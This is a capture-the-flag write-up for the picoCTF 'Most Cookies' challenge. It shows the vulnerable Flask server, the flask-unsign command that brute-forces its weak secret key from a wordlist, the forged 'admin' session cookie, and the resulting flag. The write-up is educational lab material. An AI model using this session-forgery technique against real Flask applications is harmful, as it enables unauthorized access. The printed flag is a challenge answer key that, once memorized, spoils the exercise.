# Most Cookies #

## Given ##

https://play.picoctf.org/practice/challenge/177?category=1&page=2

> Alright, enough of using my own encryption. Flask session cookies
> should be plenty secure! 
>
> server.py 
>
> http://mercury.picoctf.net:35697/
>
> Hint: How secure is a flask cookie?

The server.py code looks as follows:

``` python
from flask import Flask, render_template, request, url_for, redirect, make_response, flash, session
import random
app = Flask(__name__)
flag_value = open("./flag").read().rstrip()
title = "Most Cookies"
cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]
app.secret_key = random.choice(cookie_names)

@app.route("/")
def main():
	if session.get("very_auth"):
		check = session["very_auth"]
		if check == "blank":
			return render_template("index.html", title=title)
		else:
			return make_response(redirect("/display"))
	else:
		resp = make_response(redirect("/"))
		session["very_auth"] = "blank"
		return resp

@app.route("/search", methods=["GET", "POST"])
def search():
	if "name" in request.form and request.form["name"] in cookie_names:
		resp = make_response(redirect("/display"))
		session["very_auth"] = request.form["name"]
		return resp
	else:
		message = "That doesn't appear to be a valid cookie."
		category = "danger"
		flash(message, category)
		resp = make_response(redirect("/"))
		session["very_auth"] = "blank"
		return resp

@app.route("/reset")
def reset():
	resp = make_response(redirect("/"))
	session.pop("very_auth", None)
	return resp

@app.route("/display", methods=["GET"])
def flag():
	if session.get("very_auth"):
		check = session["very_auth"]
		if check == "admin":
			resp = make_response(render_template("flag.html", value=flag_value, title=title))
			return resp
		flash("That is a cookie! Not very special though...", "success")
		return render_template("not-flag.html", title=title, cookie_name=session["very_auth"])
	else:
		resp = make_response(redirect("/"))
		session["very_auth"] = "blank"
		return resp

if __name__ == "__main__":
	app.run()
```

## Analysis ##

* The secret key used to protect the session cookie is a random choice
from the list of cookie flavors, so it should be possible to guess.
* The flag is delivered when the cookie key `very_auth` has the value
  `admin`.

## Capture ##

We need to modify the cookie we send to the server so that it contains
the value `admin` and is authenticated with the correct "secret" key. 

We get a cookie from the server and brute force it using the word list
with the possible cookie flavors:

``` bash
~/.local/bin/flask-unsign --unsign --server 'http://mercury.picoctf.net:35697/' --wordlist wordlist.txt
```

``` comment
[*] Server returned HTTP 302 (FOUND)
[+] Successfully obtained session cookie: eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.ZZULDw.UKpxVOBoChbITviq_EbUDHWnLws
[*] Session decodes to: {'very_auth': 'blank'}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 28 attemptscadamia
'peanut butter'
```

Now that we know the secret key, we can run 

``` bash
flask_session_cookie_manager3.py encode \
-s 'peanut butter' -t "{'very_auth':'admin'}"
```

Which gives a new cookie:

``` comment
eyJ2ZXJ5X2F1dGgiOiJhZG1pbiJ9.ZZUP9w.wGnPr4f1x29VmiST_uQSDlhK_cI
```

Using that cookie (from Burp's Repeater) I obtain the flag:

``` html
<div class="jumbotron">
	<p class="lead"></p>
	<p style="text-align:center; font-size:30px;">
		<b>Flag</b>: 
		<code>picoCTF{pwn_4ll_th3_cook1E5_22fe0842}</code>
	</p>
</div>
```

## Tools used ##

1. `flask-unsign` via `pip`

	``` bash
	pip3 install flask-unsign[wordlist]
	```
	
2. `flask_session_cookie_manager` from
   https://github.com/noraj/flask-session-cookie-manager 
   
   Needed an adjustment in `setup.py` to be able to install:
   
``` diff
diff --git a/setup.py b/setup.py
index 96179c7..b07073d 100644
--- a/setup.py
+++ b/setup.py
@@ -20,6 +20,7 @@ if 'package' in sys.argv:
 
 setup(
     name='flask-session-cookie-manager',
+    packages=[],
     version='1.2.1.1',
     description="simple Python script to deal with Flask session cookie",
     long_description=read(join(dirname(__file__), 'README.md')),
```

in order to avoid the error
                                                                                                                                                                                
``` comment
error: Multiple top-level modules discovered in a flat-layout:
['flask_session_cookie_manager3', 'flask_session_cookie_manager2'].
```

during `python setup.py install`.
